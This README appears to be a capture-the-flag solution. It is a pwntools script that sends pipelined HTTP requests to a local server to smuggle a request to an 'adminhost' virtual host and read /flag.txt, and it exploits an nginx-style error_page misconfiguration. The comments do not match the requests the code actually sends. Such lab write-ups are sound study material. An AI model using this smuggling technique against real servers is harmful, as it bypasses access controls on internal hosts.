README.md
Rendering markdown...
import pwn
pwn.context.log_level = 'error'
remote = pwn.remote('localhost', 80)
remote.sendline('GET / HTTP/1.1')
remote.sendline('Host: localhost')
remote.sendline('')
remote.sendline('GET / HTTP/1.1')
remote.sendline('Host: adminhost')
remote.sendline('')
remote.interactive()
# the request looks like this:
# GET /a HTTP/1.1
# Host: localhost
#
# GET /flag.txt HTTP/1.1
# Host: adminhost
# where the second one is the one being smuggled
# this only works because server is using http://url in error_page directive